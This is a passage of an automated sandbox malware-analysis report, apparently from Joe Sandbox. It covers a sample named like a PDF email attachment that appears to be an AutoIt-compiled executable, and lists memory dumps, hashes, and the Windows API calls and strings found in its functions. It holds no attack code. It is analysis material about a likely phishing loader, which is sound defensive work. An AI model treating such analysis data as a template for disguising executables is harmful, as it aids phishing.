                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                          • Instruction ID: 24f34cd55aaf07f966b260f02ceae8d6adf5852492465438693d4067bcb23fe6
                                                                                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                          • Instruction Fuzzy Hash: 5BC1B7322050930ADF2D463D843503EFBA15EA27F135A876DD4BBCB5D6EE18C926D720
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                          • Instruction ID: f726958c99285f5f9da3bb551f0418f0651453b66527985f6e4cdf6e609f117b
                                                                                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                          • Instruction Fuzzy Hash: DAC1E7322050930ADF2D463EC43503EBBA15EA27F135A876DD4BBDB4D5EE28C925DB20
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                          • Instruction ID: 3b325f0687d125b3b4a985e83a38de58f99e5a7637de942cca30da7240aeeb09
                                                                                                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                          • Instruction Fuzzy Hash: 5AC1913230919309DF2D463D843503EBBA15EA27F139A876DD4BACB5D4EE28C925DB20
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C785B
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007C786D
                                                                                                          • DestroyWindow.USER32 ref: 007C787B
                                                                                                          • GetDesktopWindow.USER32 ref: 007C7895
                                                                                                          • GetWindowRect.USER32(00000000), ref: 007C789C
                                                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007C79DD
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007C79ED
                                                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7A35
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007C7A41
                                                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007C7A7B
                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7A9D
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AB0
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7ABB
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007C7AC4
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AD3
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 007C7ADC
                                                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7AE3
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007C7AEE
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7B00
                                                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007E2CAC,00000000), ref: 007C7B16
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007C7B26
                                                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007C7B4C
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007C7B6B
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7B8D
                                                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C7D7A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                                          • API String ID: 2211948467-2373415609
                                                                                                          • Opcode ID: 82a8b56943296bace44b9ba762a921b7dad2209a8ea8f42f1032b524ed0dba8f
                                                                                                          • Instruction ID: 34b41d105eafcd8179ab4c1c52bed0dd686e0f1032db95c59c12727952435ad5
                                                                                                          • Opcode Fuzzy Hash: 82a8b56943296bace44b9ba762a921b7dad2209a8ea8f42f1032b524ed0dba8f
                                                                                                          • Instruction Fuzzy Hash: 4D023971901119EFDB14DFA4DC89EAE7BB9FF48310F148159F916AB2A1CB78AD01CB60
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D3627
                                                                                                          • IsWindowVisible.USER32(?), ref: 007D364B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                          • API String ID: 4105515805-45149045
                                                                                                          • Opcode ID: ee71f1c4b69014595dd69dba96692f41c93daeda8ff4a92b1fe16296f363de77
                                                                                                          • Instruction ID: 17d474c88e6e2a312962207f6b69561cf238b7fddce3ee6b52fa012448ca9ed9
                                                                                                          • Opcode Fuzzy Hash: ee71f1c4b69014595dd69dba96692f41c93daeda8ff4a92b1fe16296f363de77
                                                                                                          • Instruction Fuzzy Hash: ABD19370204301DBCB04EF10C85AA6E77B1AF95794F158459F9869B3E3DB39EE09CB92
                                                                                                          APIs
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007DA630
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007DA661
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007DA66D
                                                                                                          • SetBkColor.GDI32(?,000000FF), ref: 007DA687
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007DA696
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA6C1
                                                                                                          • GetSysColor.USER32(00000010), ref: 007DA6C9
                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 007DA6D0
                                                                                                          • FrameRect.USER32(?,?,00000000), ref: 007DA6DF
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007DA6E6
                                                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA731
                                                                                                          • FillRect.USER32(?,?,00000000), ref: 007DA763
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DA78E
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(00000012), ref: 007DA903
                                                                                                            • Part of subcall function 007DA8CA: SetTextColor.GDI32(?,?), ref: 007DA907
                                                                                                            • Part of subcall function 007DA8CA: GetSysColorBrush.USER32(0000000F), ref: 007DA91D
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(0000000F), ref: 007DA928
                                                                                                            • Part of subcall function 007DA8CA: GetSysColor.USER32(00000011), ref: 007DA945
                                                                                                            • Part of subcall function 007DA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DA953
                                                                                                            • Part of subcall function 007DA8CA: SelectObject.GDI32(?,00000000), ref: 007DA964
                                                                                                            • Part of subcall function 007DA8CA: SetBkColor.GDI32(?,00000000), ref: 007DA96D
                                                                                                            • Part of subcall function 007DA8CA: SelectObject.GDI32(?,?), ref: 007DA97A
                                                                                                            • Part of subcall function 007DA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007DA999
                                                                                                            • Part of subcall function 007DA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DA9B0
                                                                                                            • Part of subcall function 007DA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007DA9C5
                                                                                                            • Part of subcall function 007DA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DA9ED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521893082-0
                                                                                                          • Opcode ID: a55b2c7becf048431dfcd10b2ec0a9c5b6ed9aba67fdc6cc0920a60a8365d089
                                                                                                          • Instruction ID: b2816f7ce44cb4df0f01c443481aedab8c751218aeecd1be02395aa0f402d4f5
                                                                                                          • Opcode Fuzzy Hash: a55b2c7becf048431dfcd10b2ec0a9c5b6ed9aba67fdc6cc0920a60a8365d089
                                                                                                          • Instruction Fuzzy Hash: DE918B72409305FFCB109F64DC08A5B7BB9FF88321F148A2AF963962A0D779D944CB56
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(?,?,?), ref: 00752CA2
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00752CE8
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00752CF3
                                                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00752CFE
                                                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00752D09
                                                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0078C43B
                                                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0078C474
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0078C89D
                                                                                                            • Part of subcall function 00751B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00752036,?,00000000,?,?,?,?,007516CB,00000000,?), ref: 00751B9A
                                                                                                          • SendMessageW.USER32(?,00001053), ref: 0078C8DA
                                                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0078C8F1
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078C907
                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0078C912
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 464785882-4108050209
                                                                                                          • Opcode ID: 6b9b7a65bcb0efc23019f957f6fdf27ae5a79c1f68b3b493fccdf4093f2a5c91
                                                                                                          • Instruction ID: bb68083ba1cbabdba65b8c0db996de5281126977edc176242baa12903333f60e
                                                                                                          • Opcode Fuzzy Hash: 6b9b7a65bcb0efc23019f957f6fdf27ae5a79c1f68b3b493fccdf4093f2a5c91
                                                                                                          • Instruction Fuzzy Hash: 3C129F30640201EFDB12DF24C888BA9B7E1FF05311F548569F996CB662CB79EC56CBA1
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 007C74DE
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C759D
                                                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C75DB
                                                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C75ED
                                                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7633
                                                                                                          • GetClientRect.USER32(00000000,?), ref: 007C763F
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7683
                                                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C7692
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007C76A2
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007C76A6
                                                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C76B6
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C76BF
                                                                                                          • DeleteDC.GDI32(00000000), ref: 007C76C8
                                                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C76F4
                                                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C770B
                                                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7746
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C775A
                                                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C776B
                                                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C779B
                                                                                                          • GetStockObject.GDI32(00000011), ref: 007C77A6
                                                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C77B1
                                                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C77BB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                          • API String ID: 2910397461-517079104
                                                                                                          • Opcode ID: e72ade4babcdd676882f244a7981bae360433b4d0cff78c13cd6f13d8081e017
                                                                                                          • Instruction ID: c3d25d950e1b6f6d0c8ff0f91dc707dd6e5415079cd60b98a6d806f3ade7094b
                                                                                                          • Opcode Fuzzy Hash: e72ade4babcdd676882f244a7981bae360433b4d0cff78c13cd6f13d8081e017
                                                                                                          • Instruction Fuzzy Hash: A3A163B1A00619FFEB14DB64DC49FAE7779EF44710F148115FA15A72E0D6B4AD00CB64
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 007BAD1E
                                                                                                          • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BADFB
                                                                                                          • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BAF59
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                          • Opcode ID: 25f20597a125e3c419d9f76f7d09a5264d0466770c8c5d81aa6b41a36be4a804
                                                                                                          • Instruction ID: d5d40e2b3600bb18e278bebeea2bcbee847b410b1b84534d0ef98f1b72860510
                                                                                                          • Opcode Fuzzy Hash: 25f20597a125e3c419d9f76f7d09a5264d0466770c8c5d81aa6b41a36be4a804
                                                                                                          • Instruction Fuzzy Hash: FD5179B0648209FECB40FB10CD96EF973A0FB08711B208066F856E62D1DA7DD989DB53
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsnicmp
                                                                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                          • API String ID: 1038674560-86951937
                                                                                                          • Opcode ID: 2f6705e867a19290b02bbdbe576164aa0e3878ec95931081487a771a11c1ea4b
                                                                                                          • Instruction ID: 1535a1ca9b2f2ab1be90fb4f270ae91abef920416c3eace6fe31dbc99e3b5c68
                                                                                                          • Opcode Fuzzy Hash: 2f6705e867a19290b02bbdbe576164aa0e3878ec95931081487a771a11c1ea4b
                                                                                                          • Instruction Fuzzy Hash: 3D812BB0640305EACF24BA60DC46FEE3768AF15751F448029FD096B196EBACDD49D391
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007D9AD2
                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007D9B8B
                                                                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 007D9BA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2326795674-4108050209
                                                                                                          • Opcode ID: 1698f26522ff0e8412884c8c665a484ce1d5641b10d188529251004dfe712477
                                                                                                          • Instruction ID: 3794c0c79555db18ef58f21a276d81240dc535a01b9595f3dc88e4016a3e4b6d
                                                                                                          • Opcode Fuzzy Hash: 1698f26522ff0e8412884c8c665a484ce1d5641b10d188529251004dfe712477
                                                                                                          • Instruction Fuzzy Hash: B302CE31205201AFD725CF24C849BAABBF5FF89314F04892EFA99D63A1D778D944CB52
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(00000012), ref: 007DA903
                                                                                                          • SetTextColor.GDI32(?,?), ref: 007DA907
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 007DA91D
                                                                                                          • GetSysColor.USER32(0000000F), ref: 007DA928
                                                                                                          • CreateSolidBrush.GDI32(?), ref: 007DA92D
                                                                                                          • GetSysColor.USER32(00000011), ref: 007DA945
                                                                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DA953
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007DA964
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 007DA96D
                                                                                                          • SelectObject.GDI32(?,?), ref: 007DA97A
                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA999
                                                                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DA9B0
                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 007DA9C5
                                                                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DA9ED
                                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DAA14
                                                                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 007DAA32
                                                                                                          • DrawFocusRect.USER32(?,?), ref: 007DAA3D
                                                                                                          • GetSysColor.USER32(00000011), ref: 007DAA4B
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 007DAA53
                                                                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAA67
                                                                                                          • SelectObject.GDI32(?,007DA5FA), ref: 007DAA7E
                                                                                                          • DeleteObject.GDI32(?), ref: 007DAA89
                                                                                                          • SelectObject.GDI32(?,?), ref: 007DAA8F
                                                                                                          • DeleteObject.GDI32(?), ref: 007DAA94
                                                                                                          • SetTextColor.GDI32(?,?), ref: 007DAA9A
                                                                                                          • SetBkColor.GDI32(?,?), ref: 007DAAA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 1996641542-0
                                                                                                          • Opcode ID: 378f32a4c92103bbd93a3b86b08f3c5a6c6126137a3772f7e66fb181e54c8794
                                                                                                          • Instruction ID: 4533a6775c2d8005f883e16bdaba94edb491f6efe80d134ae10de8ecbeddf0dc
